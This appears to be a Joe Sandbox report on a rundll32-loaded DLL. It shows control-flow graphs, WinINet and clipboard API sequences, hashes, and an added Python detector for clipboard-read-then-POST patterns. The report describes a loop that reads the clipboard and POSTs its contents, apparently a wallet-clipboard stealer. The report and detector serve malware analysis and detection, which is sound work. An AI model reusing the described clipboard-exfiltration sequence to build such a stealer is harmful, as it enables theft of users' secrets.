9670 6eb0da95 9689 6eb0f1df 9670->9689 9672->9658 9739 6eb0dbdc LeaveCriticalSection 9673->9739 9675 6eb0d88f 9675->9645 9677 6eb0da16 9676->9677 9681 6eb0da3b 9676->9681 9678 6eb0dd4c ___scrt_uninitialize_crt 25 API calls 9677->9678 9677->9681 9679 6eb0da34 9678->9679 9700 6eb0f9d7 9679->9700 9681->9672 9682 6eb0dd4c 9681->9682 9683 6eb0dd58 9682->9683 9684 6eb0dd6d 9682->9684 9685 6eb0b686 _free 14 API calls 9683->9685 9684->9670 9686 6eb0dd5d 9685->9686 9687 6eb099cc ___std_exception_copy 25 API calls 9686->9687 9688 6eb0dd68 9687->9688 9688->9670 9690 6eb0f1f0 9689->9690 9691 6eb0f1fd 9689->9691 9692 6eb0b686 _free 14 API calls 9690->9692 9693 6eb0f246 9691->9693 9695 6eb0f224 9691->9695 9699 6eb0f1f5 9692->9699 9694 6eb0b686 _free 14 API calls 9693->9694 9696 6eb0f24b 9694->9696 9725 6eb0f13d 9695->9725 9698 6eb099cc ___std_exception_copy 25 API calls 9696->9698 9698->9699 9699->9672 9701 6eb0f9e3 CallCatchBlock 9700->9701 9702 6eb0fa03 9701->9702 9703 6eb0f9eb 9701->9703 9705 6eb0fa9e 9702->9705 9709 6eb0fa35 9702->9709 9704 6eb0b673 __dosmaperr 
14 API calls 9703->9704 9706 6eb0f9f0 9704->9706 9707 6eb0b673 __dosmaperr 14 API calls 9705->9707 9708 6eb0b686 _free 14 API calls 9706->9708 9710 6eb0faa3 9707->9710 9711 6eb0f9f8 9708->9711 9712 6eb0effc ___scrt_uninitialize_crt EnterCriticalSection 9709->9712 9713 6eb0b686 _free 14 API calls 9710->9713 9711->9681 9714 6eb0fa3b 9712->9714 9715 6eb0faab 9713->9715 9716 6eb0fa57 9714->9716 9717 6eb0fa6c 9714->9717 9718 6eb099cc ___std_exception_copy 25 API calls 9715->9718 9719 6eb0b686 _free 14 API calls 9716->9719 9720 6eb0fac9 ___scrt_uninitialize_crt 60 API calls 9717->9720 9718->9711 9721 6eb0fa5c 9719->9721 9723 6eb0fa67 9720->9723 9722 6eb0b673 __dosmaperr 14 API calls 9721->9722 9722->9723 9724 6eb0fa96 ___scrt_uninitialize_crt LeaveCriticalSection 9723->9724 9724->9711 9726 6eb0f149 CallCatchBlock 9725->9726 9727 6eb0effc ___scrt_uninitialize_crt EnterCriticalSection 9726->9727 9728 6eb0f158 9727->9728 9729 6eb0f19f 9728->9729 9730 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 9728->9730 9731 6eb0b686 _free 14 API calls 9729->9731 9732 6eb0f184 FlushFileBuffers 9730->9732 9733 6eb0f1a4 9731->9733 9732->9733 9734 6eb0f190 9732->9734 9735 6eb0f1d3 ___scrt_uninitialize_crt LeaveCriticalSection 9733->9735 9736 6eb0b673 __dosmaperr 14 API calls 9734->9736 9737 6eb0f1bc 9735->9737 9738 6eb0f195 GetLastError 9736->9738 9737->9699 9738->9729 9739->9675 9740->9661 9746 6eb0ad22 9741->9746 9744 6eb0804e ___vcrt_uninitialize_ptd 6 API calls 9745 6eb06f21 9744->9745 9745->9024 9749 6eb0b504 9746->9749 9750 6eb06939 9749->9750 9751 6eb0b50e 9749->9751 9750->9744 9753 6eb0d01e 9751->9753 9754 6eb0cefd __dosmaperr 5 API calls 9753->9754 9755 6eb0d03a 9754->9755 9756 6eb0d055 TlsFree 9755->9756 9757 6eb0d043 9755->9757 9757->9750 11280 6eb0db7c 11281 6eb0daab ___scrt_uninitialize_crt 66 API calls 11280->11281 11282 6eb0db84 11281->11282 11290 6eb0fca3 11282->11290 11284 6eb0db89 11300 6eb0fd4e 11284->11300 11287 6eb0dbb3 11288 6eb0b90f _free 14 API calls 11287->11288 
11289 6eb0dbbe 11288->11289 11291 6eb0fcaf CallCatchBlock 11290->11291 11304 6eb0b7d4 EnterCriticalSection 11291->11304 11293 6eb0fcba 11294 6eb0fd26 11293->11294 11297 6eb0fcfa DeleteCriticalSection 11293->11297 11305 6eb10155 11293->11305 11318 6eb0fd45 11294->11318 11299 6eb0b90f _free 14 API calls 11297->11299 11299->11293 11301 6eb0fd65 11300->11301 11302 6eb0db98 DeleteCriticalSection 11300->11302 11301->11302 11303 6eb0b90f _free 14 API calls 11301->11303 11302->11284 11302->11287 11303->11302 11304->11293 11306 6eb10161 CallCatchBlock 11305->11306 11307 6eb10180 11306->11307 11308 6eb1016b 11306->11308 11315 6eb1017b 11307->11315 11321 6eb0dbc8 EnterCriticalSection 11307->11321 11309 6eb0b686 _free 14 API calls 11308->11309 11310 6eb10170 11309->11310 11312 6eb099cc ___std_exception_copy 25 API calls 11310->11312 11312->11315 11313 6eb1019d 11322 6eb100de 11313->11322 11315->11293 11316 6eb101a8 11338 6eb101cf 11316->11338 11410 6eb0b81c LeaveCriticalSection 11318->11410 11320 6eb0fd32 11320->11284 11321->11313 11323 6eb10100 11322->11323 11324 6eb100eb 11322->11324 11327 6eb0d9fe ___scrt_uninitialize_crt 62 API calls 11323->11327 11329 6eb100fb 11323->11329 11325 6eb0b686 _free 14 API calls 11324->11325 11326 6eb100f0 11325->11326 11328 6eb099cc ___std_exception_copy 25 API calls 11326->11328 11330 6eb10115 11327->11330 11328->11329 11329->11316 11331 6eb0fd4e 14 API calls 11330->11331 11332 6eb1011d 11331->11332 11333 6eb0dd4c ___scrt_uninitialize_crt 25 API calls 11332->11333 11334 6eb10123 11333->11334 11341 6eb10747 11334->11341 11337 6eb0b90f _free 14 API calls 11337->11329 11409 6eb0dbdc LeaveCriticalSection 11338->11409 11340 6eb101d7 11340->11315 11342 6eb10758 11341->11342 11343 6eb1076d 11341->11343 11344 6eb0b673 __dosmaperr 14 API calls 11342->11344 11345 6eb107b6 11343->11345 11349 6eb10794 11343->11349 11346 6eb1075d 11344->11346 11347 6eb0b673 __dosmaperr 14 API calls 11345->11347 11348 6eb0b686 _free 14 API calls 11346->11348 11350 6eb107bb 
11347->11350 11354 6eb10129 11348->11354 11356 6eb106bb 11349->11356 11351 6eb0b686 _free 14 API calls 11350->11351 11353 6eb107c3 11351->11353 11355 6eb099cc ___std_exception_copy 25 API calls 11353->11355 11354->11329 11354->11337 11355->11354 11357 6eb106c7 CallCatchBlock 11356->11357 11367 6eb0effc EnterCriticalSection 11357->11367 11359 6eb106d5 11360 6eb10707 11359->11360 11361 6eb106fc 11359->11361 11362 6eb0b686 _free 14 API calls 11360->11362 11368 6eb107d4 11361->11368 11364 6eb10702 11362->11364 11383 6eb1073b 11364->11383 11367->11359 11386 6eb0f0d3 11368->11386 11370 6eb107ea 11399 6eb0f042 11370->11399 11371 6eb107e4 11371->11370 11374 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11371->11374 11382 6eb1081c 11371->11382 11376 6eb10813 11374->11376 11375 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11377 6eb10828 CloseHandle 11375->11377 11380 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11376->11380 11377->11370 11381 6eb10834 GetLastError 11377->11381 11378 6eb0b650 __dosmaperr 14 API calls 11379 6eb10864 11378->11379 11379->11364 11380->11382 11381->11370 11382->11370 11382->11375 11408 6eb0f01f LeaveCriticalSection 11383->11408 11385 6eb10724 11385->11354 11387 6eb0f0e0 11386->11387 11389 6eb0f0f5 11386->11389 11388 6eb0b673 __dosmaperr 14 API calls 11387->11388 11390 6eb0f0e5 11388->11390 11391 6eb0b673 __dosmaperr 14 API calls 11389->11391 11393 6eb0f11a 11389->11393 11392 6eb0b686 _free 14 API calls 11390->11392 11394 6eb0f125 11391->11394 11395 6eb0f0ed 11392->11395 11393->11371 11396 6eb0b686 _free 14 API calls 11394->11396 11395->11371 11397 6eb0f12d 11396->11397 11398 6eb099cc ___std_exception_copy 25 API calls 11397->11398 11398->11395 11400 6eb0f051 11399->11400 11401 6eb0f0b8 11399->11401 11400->11401 11407 6eb0f07b 11400->11407 11402 6eb0b686 _free 14 API calls 11401->11402 11403 6eb0f0bd 11402->11403 11404 6eb0b673 __dosmaperr 14 API calls 11403->11404 11405 6eb0f0a8 11404->11405 11405->11378 11405->11379 11406 6eb0f0a2 
SetStdHandle 11406->11405 11407->11405 11407->11406 11408->11385 11409->11340 11410->11320 11497 6eb0b76c 11500 6eb0b6f3 11497->11500 11501 6eb0b6ff CallCatchBlock 11500->11501 11508 6eb0b7d4 EnterCriticalSection 11501->11508 11503 6eb0b709 11504 6eb0b737 11503->11504 11507 6eb0e0bd __fassign 14 API calls 11503->11507 11509 6eb0b755 11504->11509 11507->11503 11508->11503 11512 6eb0b81c LeaveCriticalSection 11509->11512 11511 6eb0b743 11512->11511

                      Control-flow Graph

[graph residue for 6eb01ec0, the entry stub of the HTTP POST routine at 6eb01ed0; the graph image is not recoverable here. Recoverable path: a std::_Xinvalid_argument guard (6eb06751; the string "string too long" sits in this function's string pool), then the executed chain InternetOpenW -> InternetConnectA -> HttpOpenRequestA -> HttpSendRequestA -> InternetReadFile, looping back to InternetReadFile until a read returns no data, then InternetCloseHandle x 3. Every other branch is a helper call (6eb05d90, 6eb0679f, 6eb06390/6eb09260) guarded by the same error path (6eb099dc, 6eb06791, 6eb06c3c).]
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 6EB01EC5
                        • Part of subcall function 6EB06751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EB0675D
                      • InternetOpenW.WININET(6EB1BA1C,00000000,00000000,00000000,00000000), ref: 6EB01FA7
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EB01FCE
                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EB01FF8
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EB02031
                      • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EB0204B
                      • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EB0224B
                      • InternetCloseHandle.WININET(00000000), ref: 6EB02266
                      • InternetCloseHandle.WININET(?), ref: 6EB0226E
                      • InternetCloseHandle.WININET(?), ref: 6EB02276
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
                      • API String ID: 4066372336-370044323
                      • Opcode ID: d520224b9eecfa50f37449d3ddc49150a87d847108f082bf7c6299cdcf5ba21d
                      • Instruction ID: 98460afafbabe98c3bae8bb11b783ae25e77c65d690925e1dbbbf65fe99406fb
                      • Opcode Fuzzy Hash: d520224b9eecfa50f37449d3ddc49150a87d847108f082bf7c6299cdcf5ba21d
                      • Instruction Fuzzy Hash: F0F1D1B05101989FEB24CF68CC84BDDBFB5EF44314F504198E609AB686CB75AAC8CF55
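The WinINet sequence listed above (InternetOpenW, InternetConnectA on port 0x50 with nService 3, HttpOpenRequestA with verb POST, HttpSendRequestA, InternetReadFile in 0x3FF-byte chunks, three InternetCloseHandle calls) is a host-side pattern that a sandbox or EDR API trace can be matched against, and it becomes far more specific once it is paired with the clipboard read performed by the routine that calls it (see the 6eb031b0 graph below). The following Python is an added example written for this page, not code from the report or from the sample: it runs an in-order sequence matcher over a constructed API trace whose API names and argument positions follow the report's API list (the argument values are copied from the report where it shows them, "?" standing for a pointer the sandbox did not resolve; the WideCharToMultiByte arguments and the clipboard format 13 are constructed assumptions), and reports each clipboard read that is followed by a WinINet POST, decoding the port and nService value on the way.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    seq: int           # position of the call in the trace
    api: str           # API name as the sandbox logs it
    args: tuple = ()   # positional arguments as logged (ints, or "?" for unresolved pointers)


# Calls that make up one clipboard read, in the order the 6eb031b0 graph shows them.
CLIPBOARD_READ = ("OpenClipboard", "GetClipboardData", "GlobalLock",
                  "WideCharToMultiByte", "GlobalUnlock", "CloseClipboard")

# Calls that make up one WinINet request, in the order the 6eb01ed0 graph shows them.
WININET_REQUEST = ("InternetOpenW", "InternetConnectA", "HttpOpenRequestA",
                   "HttpSendRequestA", "InternetReadFile")

# nService values accepted by InternetConnectA (wininet.h); the report logs 3.
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                    3: "INTERNET_SERVICE_HTTP"}


def arg(call, index):
    """Argument `index` of a call, or None when the log did not record that many."""
    return call.args[index] if index < len(call.args) else None


def match_in_order(trace, names, start=0):
    """Indices of calls matching `names` in order (gaps allowed) at or after `start`, else None."""
    found = []
    i = start
    for name in names:
        while i < len(trace) and trace[i].api != name:
            i += 1
        if i == len(trace):
            return None
        found.append(i)
        i += 1
    return found


def find_clipboard_exfil(trace):
    """Pair every clipboard read with the first WinINet POST that follows it in the trace."""
    findings = []
    pos = 0
    while (clip := match_in_order(trace, CLIPBOARD_READ, pos)) is not None:
        pos = clip[-1] + 1
        net = match_in_order(trace, WININET_REQUEST, pos)
        if net is None:
            break                       # clipboard read with no network activity after it
        connect, open_req, read = trace[net[1]], trace[net[2]], trace[net[4]]
        pos = net[-1] + 1
        if arg(open_req, 1) != "POST":  # HttpOpenRequestA(hConnect, lpszVerb, ...)
            continue
        findings.append({
            "clipboard_read_seq": trace[clip[0]].seq,
            "post_seq": open_req.seq,
            "port": arg(connect, 2),                           # InternetConnectA nServerPort
            "service": INTERNET_SERVICE.get(arg(connect, 5)),  # InternetConnectA nService
            "read_chunk": arg(read, 2),                        # InternetReadFile dwNumberOfBytesToRead
        })
    return findings


# Constructed trace modelled on the report's API list. Values the report shows are copied;
# the WideCharToMultiByte arguments and the clipboard format 13 (CF_UNICODETEXT) are assumptions.
SAMPLE_TRACE = [
    ApiCall(1, "OpenClipboard", (0,)),
    ApiCall(2, "GetClipboardData", (13,)),
    ApiCall(3, "GlobalLock", ("?",)),
    ApiCall(4, "WideCharToMultiByte", (0, 0, "?", -1, 0, 0, 0, 0)),      # size query
    ApiCall(5, "WideCharToMultiByte", (0, 0, "?", -1, "?", 0x40, 0, 0)),  # conversion
    ApiCall(6, "GlobalUnlock", ("?",)),
    ApiCall(7, "CloseClipboard", ()),
    ApiCall(8, "InternetOpenW", (0x6EB1BA1C, 0, 0, 0, 0)),
    ApiCall(9, "InternetConnectA", (0, "?", 0x50, 0, 0, 3, 0, 1)),
    ApiCall(10, "HttpOpenRequestA", (0, "POST", "?", 0, 0, 0, 0, 1)),
    ApiCall(11, "HttpSendRequestA", (0, 0, 0, "?", 0)),
    ApiCall(12, "InternetReadFile", (0, "?", 0x3FF, "?")),
    ApiCall(13, "InternetReadFile", ("?", 0, 0x3FF, 0)),
    ApiCall(14, "InternetCloseHandle", (0,)),
    ApiCall(15, "InternetCloseHandle", ("?",)),
    ApiCall(16, "InternetCloseHandle", ("?",)),
]


if __name__ == "__main__":
    for finding in find_clipboard_exfil(SAMPLE_TRACE):
        print(finding)
```

Gaps between the named calls are allowed on purpose: real traces interleave heap, string and locale calls (the 6eb05d90/6eb0679f helpers in the graphs) between the interesting ones, and the second WideCharToMultiByte of the size-then-convert pair is skipped the same way. A clipboard read on its own is ordinary Windows behaviour; the pairing with a POST in the same process is what makes the finding worth an alert.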

                      Control-flow Graph

[graph residue for 6eb031b0, the clipboard-reading loop; the graph image is not recoverable here. Recoverable path: the function first builds strings (repeated 6eb05d90 / 6eb05ed0 / 6eb06060 calls, each guarded by the 6eb0679f / 6eb099dc error path), then OpenClipboard -> GetClipboardData -> GlobalLock -> WideCharToMultiByte twice (the usual size-query-then-convert pair, so the clipboard is read as Unicode text) -> GlobalUnlock -> CloseClipboard. After that it calls the POST routine 6eb01ed0 and, as its last action, calls 6eb031b0 again, so the read-and-post cycle repeats. The string pool of this function holds "+++", "abcdefghijklmnopqrstuvwxyz0123456789" and "wlt=1".]
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
                      • API String ID: 0-2251221455
                      • Opcode ID: 10ad944105cd746348be17546ab2d008e0259302a403ed3c073af3d69636ca0f
                      • Instruction ID: 33892bd86366a74b6555ab339c784471e57e73d31917d278b4aab631e31dd4b0
                      • Opcode Fuzzy Hash: 10ad944105cd746348be17546ab2d008e0259302a403ed3c073af3d69636ca0f
                      • Instruction Fuzzy Hash: 5AF10970A10289AFEB04CFA8CC59BDEBFB9EB45724F10461DE411AB7C0DB75A944CB91

                      Control-flow Graph
                      control_flow_graph 90 6eb01ed0-6eb01f1c 91 6eb01f22-6eb01f26 90->91 92 6eb0242e-6eb02459 call 6eb05d90 90->92 91->92 93 6eb01f2c-6eb01f30 91->93 98 6eb02483-6eb0249b 92->98 99 6eb0245b-6eb02467 92->99 93->92 95 6eb01f36-6eb02053 call 6eb05d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 93->95 107 6eb02059 95->107 108 6eb0225f-6eb022c8 InternetCloseHandle * 3 95->108 103 6eb024a1-6eb024ad 98->103 104 6eb023e5-6eb023fd 98->104 100 6eb02479-6eb02480 call 6eb0679f 99->100 101 6eb02469-6eb02477 99->101 100->98 101->100 105 6eb024ef call 6eb099dc 101->105 109 6eb024b3-6eb024c1 103->109 110 6eb023db-6eb023e2 call 6eb0679f 103->110 111 6eb024d2-6eb024ee call 6eb06791 104->111 112 6eb02403-6eb0240f 104->112 123 6eb024f4-6eb024f9 call 6eb06c3c 105->123 117 6eb02060-6eb02067 107->117 114 6eb022ca-6eb022d9 108->114 115 6eb022ff-6eb0231d 108->115 109->105 119 6eb024c3 109->119 110->104 120 6eb02415-6eb02423 112->120 121 6eb024c8-6eb024cf call 6eb0679f 112->121 124 6eb022db-6eb022e9 114->124 125 6eb022ef-6eb022fc call 6eb0679f 114->125 126 6eb02350-6eb02371 115->126 127 6eb0231f-6eb02330 115->127 128 6eb02259 117->128 129 6eb0206d-6eb0209b 117->129 119->110 120->105 132 6eb02429 120->132 121->111 124->105 124->125 125->115 140 6eb02373-6eb0237f 126->140 141 6eb0239f-6eb023b7 126->141 136 6eb02332-6eb02340 127->136 137 6eb02346-6eb0234d call 6eb0679f 127->137 128->108 138 6eb020a0-6eb020a5 129->138 132->121 136->105 136->137 137->126 138->138 145 6eb020a7-6eb0214b call 6eb05d90 * 2 138->145 147 6eb02381-6eb0238f 140->147 148 6eb02395-6eb0239c call 6eb0679f 140->148 141->104 142 6eb023b9-6eb023c5 141->142 142->110 150 6eb023c7-6eb023d5 142->150 157 6eb02181-6eb0219a call 6eb06390 145->157 158 6eb0214d-6eb0217f call 6eb09260 145->158 147->105 147->148 148->141 150->105 150->110 163 6eb021a0-6eb021ad 157->163 158->163 164 6eb021da-6eb021e7 163->164 165 6eb021af-6eb021ba 163->165 168 6eb02218-6eb02223 164->168 169 6eb021e9-6eb021f8 164->169 166 6eb021d0-6eb021d7 call 6eb0679f 165->166 167 6eb021bc-6eb021ca 165->167 166->164 167->105 167->166 168->123 173 6eb02229-6eb02253 InternetReadFile 168->173 171 6eb021fa-6eb02208 169->171 172 6eb0220e-6eb02215 call 6eb0679f 169->172 171->105 171->172 172->168 173->117 173->128
                      APIs
                      • InternetOpenW.WININET(6EB1BA1C,00000000,00000000,00000000,00000000), ref: 6EB01FA7
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EB01FCE
                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EB01FF8
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EB02031
                      • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EB0204B
                      • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EB0224B
                      • InternetCloseHandle.WININET(00000000), ref: 6EB02266
                      • InternetCloseHandle.WININET(?), ref: 6EB0226E
                      • InternetCloseHandle.WININET(?), ref: 6EB02276
                      Strings
                      • POST, xrefs: 6EB01FF2
                      • Content-Type: application/x-www-form-urlencoded, xrefs: 6EB01F71
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                      • String ID: Content-Type: application/x-www-form-urlencoded$POST
                      • API String ID: 1354133546-2387545335
                      • Opcode ID: 3a39a2de1be8b3ee9d76acc5d222ca0f41c7a19cd69c5d903c527bc391ba9f14
                      • Instruction ID: c6d4c285205ff4b868b56fd5896807c1fef63540ee74febecf16126242591acc
                      • Opcode Fuzzy Hash: 3a39a2de1be8b3ee9d76acc5d222ca0f41c7a19cd69c5d903c527bc391ba9f14
                      • Instruction Fuzzy Hash: 4AF1E2B06101589FEB24CF68CC84BDDBFB5EF44314F5041A8E609AB686CB75AAC8CF55

                      Control-flow Graph

                      APIs
                      • __RTC_Initialize.LIBCMT ref: 6EB06EC1
                      • ___scrt_uninitialize_crt.LIBCMT ref: 6EB06EDB
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Initialize___scrt_uninitialize_crt
                      • String ID:
                      • API String ID: 2442719207-0
                      • Opcode ID: a50f439caa825ec316ddd10c37158a6fa7f68c2b723d99c2cc13db2f53464c6e
                      • Instruction ID: 51f75abeffbb517fb0fcf4843f6f0159dad2e37820d6acff6a5ddc3b925f8a92
                      • Opcode Fuzzy Hash: a50f439caa825ec316ddd10c37158a6fa7f68c2b723d99c2cc13db2f53464c6e
                      • Instruction Fuzzy Hash: B0412672D302E9AFDB209FD4CC40BDE7E78EF417A4F10491AF81467A94D770AA418BA0

                      Control-flow Graph
                      control_flow_graph 353 6eb06f2c-6eb06f3d call 6eb073b0 356 6eb06f4e-6eb06f55 353->356 357 6eb06f3f-6eb06f45 353->357 359 6eb06f61-6eb06f75 dllmain_raw 356->359 360 6eb06f57-6eb06f5a 356->360 357->356 358 6eb06f47-6eb06f49 357->358 364 6eb07027-6eb07036 358->364 362 6eb06f7b-6eb06f8c dllmain_crt_dispatch 359->362 363 6eb0701e-6eb07025 359->363 360->359 361 6eb06f5c-6eb06f5f 360->361 365 6eb06f92-6eb06fa4 call 6eb06640 361->365 362->363 362->365 363->364 368 6eb06fa6-6eb06fa8 365->368 369 6eb06fcd-6eb06fcf 365->369 368->369 370 6eb06faa-6eb06fc8 call 6eb06640 call 6eb06e7a dllmain_raw 368->370 371 6eb06fd1-6eb06fd4 369->371 372 6eb06fd6-6eb06fe7 dllmain_crt_dispatch 369->372 370->369 371->363 371->372 372->363 374 6eb06fe9-6eb0701b dllmain_raw 372->374 374->363
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: dllmain_raw$dllmain_crt_dispatch
                      • String ID:
                      • API String ID: 3136044242-0
                      • Opcode ID: e033e78456e5a113dbd0466bf413a4851cf475704c8cf9dcb633048f3c736815
                      • Instruction ID: 53f2a2c2050b1ffc257206cd73bc95c1226422f3bdf79aa39f0df61a2ee00cd7
                      • Opcode Fuzzy Hash: e033e78456e5a113dbd0466bf413a4851cf475704c8cf9dcb633048f3c736815
                      • Instruction Fuzzy Hash: D621B1719202AAAFCB219FD4C940AAF7E6DEF80794F014615F8146B654D770AE818BE0

                      Control-flow Graph

                      APIs
                      • GetLastError.KERNEL32(?,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B428
                      • _free.LIBCMT ref: 6EB0B485
                      • _free.LIBCMT ref: 6EB0B4BB
                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B4C6
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast_free
                      • String ID:
                      • API String ID: 2283115069-0
                      • Opcode ID: 2a306f356bbc4b912186c817ff11e32600f58cd7f9701e313d5d6adbe03477a2
                      • Instruction ID: 814a0ccb8468b6300e979314ab43e89db59cca3d3d0eab050f4da3b9875d4bb8
                      • Opcode Fuzzy Hash: 2a306f356bbc4b912186c817ff11e32600f58cd7f9701e313d5d6adbe03477a2
                      • Instruction Fuzzy Hash: 6D1140316245826FDB405AF55CD6F9F2D5DDBC23787240D28F528935D8EF20EE014121

                      Control-flow Graph

                      APIs
                      • __RTC_Initialize.LIBCMT ref: 6EB06DC0
                        • Part of subcall function 6EB07490: InitializeSListHead.KERNEL32(6EB1F718,6EB06DCA,6EB1C7B0,00000010,6EB06D5B,?,?,?,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8), ref: 6EB07495
                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EB06E2A
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                      • String ID:
                      • API String ID: 3231365870-0
                      • Opcode ID: 8ff62b332a3827febdf70d9370ab7d13f03164b3282aadbcfe3b60ca3d8bf404
                      • Instruction ID: de299be35e08db587c77f3771d63ee25ed15fcb95f6418fdb2ff57efdceefd65
                      • Opcode Fuzzy Hash: 8ff62b332a3827febdf70d9370ab7d13f03164b3282aadbcfe3b60ca3d8bf404
                      • Instruction Fuzzy Hash: 7D21F0325383D59EEB45ABF4E9107DC7FA5EF1233DF10485AD9806BAC9CB627080C662

                      Control-flow Graph
